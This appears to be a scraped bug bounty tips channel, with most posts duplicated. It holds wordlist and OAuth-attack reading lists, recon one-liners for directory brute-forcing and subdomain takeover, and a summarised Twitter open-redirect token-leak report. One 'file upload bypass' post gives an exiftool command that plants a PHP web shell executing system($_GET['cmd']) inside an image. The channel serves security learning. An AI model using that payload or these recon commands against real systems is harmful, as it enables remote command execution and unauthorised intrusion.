All Security Assessment Wordlists 📃 : 👇
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
in One Place
• https://github.com/danielmiessler/SecLists
• https://github.com/Dormidera/WordList-Compendium
• https://github.com/kaonashi-passwords/Kaonashi
• https://github.com/google/fuzzing/tree/master/dictionaries
• https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
#bugbounty #Infosec
🔥8👍6
General Discussion On :
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA
Link : https://youtu.be/kwePER0er84
#bugbounty #infosec #cybersecurity
YouTube
BUG BOUNTY - IDOR CSRF AND ACCOUNT TAKEOVERS with HARSH BOTHRA ||ZERO DAY EP 02
Cyberhawk Security session with guest HARSH BOTHRA and host NJAY.
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👽TOPICS WE COVERED :
-Life/Career Journey
-Bug Bounty
-IDOR, CSRF, ACCOUNT TAKEOVERS
-Vulnerability Chaining
-Vulns and Methodology
-Red-Team
-How to become a Synack Red Teamer
CONNECT…
👍9👎1🤩1
Bypass File Upload Filtering :
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
In image :
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' shell.jpg
mv shell.jpg shell.php.jpg
#bugbountytip #infosec #cybersecuritytips
👍15😍5
Bug Bounty Tip 😃
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:
dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
When you're brute forcing for endpoints, don't forget to add extensions. You can also use this method to discover backup files. Here's a command I use frequently:
dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <target>
👍23⚡4👏3🥰1🌚1
Parin's Burpsuite course for 0$, yeah totally #free.
https://www.udemy.com/course/bug-bounty-hunting-with-burp-suite/?couponCode=WHITEFRIDAYHERE
Coupons are limited. Be fast
Share to all.
#bugbounty #infosec
https://www.udemy.com/course/bug-bounty-hunting-with-burp-suite/?couponCode=WHITEFRIDAYHERE
Coupons are limited. Be fast
Share to all.
#bugbounty #infosec
🔥8😢6🥰5👍3❤1🤨1
🔍 8 Best Recon Technique For Active Subdomain Enumeration
link : https://bugbountyguide.org/index.php/2022/11/26/8-best-recon-technique-for-active-subdomain-enumeration/
#bugbounty #infosec #cybersecurity
link : https://bugbountyguide.org/index.php/2022/11/26/8-best-recon-technique-for-active-subdomain-enumeration/
#bugbounty #infosec #cybersecurity
👍8🔥4👌1
Guys 👆! Which logo Looks Good For Our New Website bugbountyguide.org. I'll put whatever you choose ( high percentage will consider )👇
Anonymous Poll
17%
1
27%
2
55%
3
👍9🥰2❤1
Bug Bounty Reports in Thread 🧵
#bugbounty #Infosec
Bug : OAuth 2.0
Open Redirect Leak of authenticity_token lead to full account take over.
Organisation : Twitter
Bounty : $1400
==Start==
Impact URL:
https://mobile.twitter. com/messages/follow?recipient=/example.com
•when He click Follow
•And this cause redirect his POST request to https://example.com which contains his authenticity_token
Impact : Can be used for anything like tweeting, following, sending messages, changing username.,.,.etc
it can be used too to Add a mobile number, and then steal the account by recovering it by the mobile number.
Thanks For Reading This Amazing Bug Bounty Reports in thread 🧵 On OAuth 2.0
Hope you like it 👍
#bugbounty #Infosec
Bug : OAuth 2.0
Open Redirect Leak of authenticity_token lead to full account take over.
Organisation : Twitter
Bounty : $1400
==Start==
Impact URL:
https://mobile.twitter. com/messages/follow?recipient=/example.com
•when He click Follow
•And this cause redirect his POST request to https://example.com which contains his authenticity_token
Impact : Can be used for anything like tweeting, following, sending messages, changing username.,.,.etc
it can be used too to Add a mobile number, and then steal the account by recovering it by the mobile number.
Thanks For Reading This Amazing Bug Bounty Reports in thread 🧵 On OAuth 2.0
Hope you like it 👍
🔥13❤4👍2
Penetration Test Guide based on the OWASP and More
#bugbounty #infosec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out : 👌👇
#bugbounty #infosec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out : 👌👇
👍11🥰4❤1
Bugbounty Notes 📒
Inclue OWASP Top 10 And more
#bugbounty #Infsoec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out : 👌👆
Inclue OWASP Top 10 And more
#bugbounty #Infsoec
Amazing Git Repo : https://github.com/Voorivex/pentest-guide
Check This Out : 👌👆
❤9🔥1
Master OAuth 2.0 Vulnerability
#bugbounty #infosec
Difficulty : Any
OAuth 2.0 Resources :👇
• https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso.pdf
• https://medium.com/@lokeshdlk77/stealing-facebook-mailchimp-application-oauth-2-0-access-token-3af51f89f5b0
• https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
• https://gauravnarwani.com/misconfigured-oauth-to-account-takeover/
• https://medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a
• https://medium.com/@logicbomb_1/bugbounty-user-account-takeover-i-just-need-your-email-id-to-login-into-your-shopping-portal-7fd4fdd6dd56
• https://medium.com/@protector47/full-account-takeover-via-referrer-header-oauth-token-steal-open-redirect-vulnerability-chaining-324a14a1567
• https://hackerone.com/reports/49759
• https://hackerone.com/reports/131202
• https://hackerone.com/reports/6017
• https://hackerone.com/reports/7900
• https://hackerone.com/reports/244958
• https://hackerone.com/reports/405100
• https://ysamm.com/?p=379
• https://amolbaikar.com/facebook-oauth-framework-vulnerability/
•https://medium.com/@godofdarkness.msf/mail-ru-ext-b-scope-account-takeover-1500-abdb1560e5f9
• https://medium.com/@tristanfarkas/finding-a-security-bug-in-discord-and-what-it-taught-me-516cda561295
• https://medium.com/@0xgaurang/case-study-oauth-misconfiguration-leads-to-account-takeover-d3621fe8308b
• https://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74
• http://blog.intothesymmetry.com/2014/02/oauth-2-attacks-and-bug-bounties.html
• http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html
• https://veracode.com/blog/research/spring-social-core-vulnerability-disclosure
• https://medium.com/@apkash8/oauth-and-security-7fddce2e1dc5
• https://xploitprotocol.medium.com/exploiting-oauth-2-0-authorization-code-grants-379798888893
Thanks You For Reading this 🙏
Hope You'll like 👍 it
#bugbounty #infosec
Difficulty : Any
OAuth 2.0 Resources :👇
• https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso.pdf
• https://medium.com/@lokeshdlk77/stealing-facebook-mailchimp-application-oauth-2-0-access-token-3af51f89f5b0
• https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
• https://gauravnarwani.com/misconfigured-oauth-to-account-takeover/
• https://medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a
• https://medium.com/@logicbomb_1/bugbounty-user-account-takeover-i-just-need-your-email-id-to-login-into-your-shopping-portal-7fd4fdd6dd56
• https://medium.com/@protector47/full-account-takeover-via-referrer-header-oauth-token-steal-open-redirect-vulnerability-chaining-324a14a1567
• https://hackerone.com/reports/49759
• https://hackerone.com/reports/131202
• https://hackerone.com/reports/6017
• https://hackerone.com/reports/7900
• https://hackerone.com/reports/244958
• https://hackerone.com/reports/405100
• https://ysamm.com/?p=379
• https://amolbaikar.com/facebook-oauth-framework-vulnerability/
•https://medium.com/@godofdarkness.msf/mail-ru-ext-b-scope-account-takeover-1500-abdb1560e5f9
• https://medium.com/@tristanfarkas/finding-a-security-bug-in-discord-and-what-it-taught-me-516cda561295
• https://medium.com/@0xgaurang/case-study-oauth-misconfiguration-leads-to-account-takeover-d3621fe8308b
• https://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74
• http://blog.intothesymmetry.com/2014/02/oauth-2-attacks-and-bug-bounties.html
• http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html
• https://veracode.com/blog/research/spring-social-core-vulnerability-disclosure
• https://medium.com/@apkash8/oauth-and-security-7fddce2e1dc5
• https://xploitprotocol.medium.com/exploiting-oauth-2-0-authorization-code-grants-379798888893
Thanks You For Reading this 🙏
Hope You'll like 👍 it
❤12👍9🤯1😱1
One-liner Bugbounty Tips 📌
Find Subdomains TakeOver
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
#bugbounty #infosec
Find Subdomains TakeOver
subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
#bugbounty #infosec
👍11🔥3
Gather Domains from Content-Security-Policy
#bugbounty #Infosec
curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
Look : 👆
#bugbounty #Infosec
curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u
Look : 👆
👍6👌1
👍6🔥2❤1🥰1
Complete OSCP Guide With Active Directory
Amazing Article Contains :
• lots of tips
• Recommended Tools For Active Directory
• Recommended Labs To Solve For Active Directory
• Cheatsheet
• Resources
Take 👇 : Look
https://bugbountyguide.org/index.php/2022/11/29/oscp-preparation-with-active-directory/
#bugbounty #infosec #oscp
Amazing Article Contains :
• lots of tips
• Recommended Tools For Active Directory
• Recommended Labs To Solve For Active Directory
• Cheatsheet
• Resources
Take 👇 : Look
https://bugbountyguide.org/index.php/2022/11/29/oscp-preparation-with-active-directory/
#bugbounty #infosec #oscp
🔥10❤🔥5👍3🤩1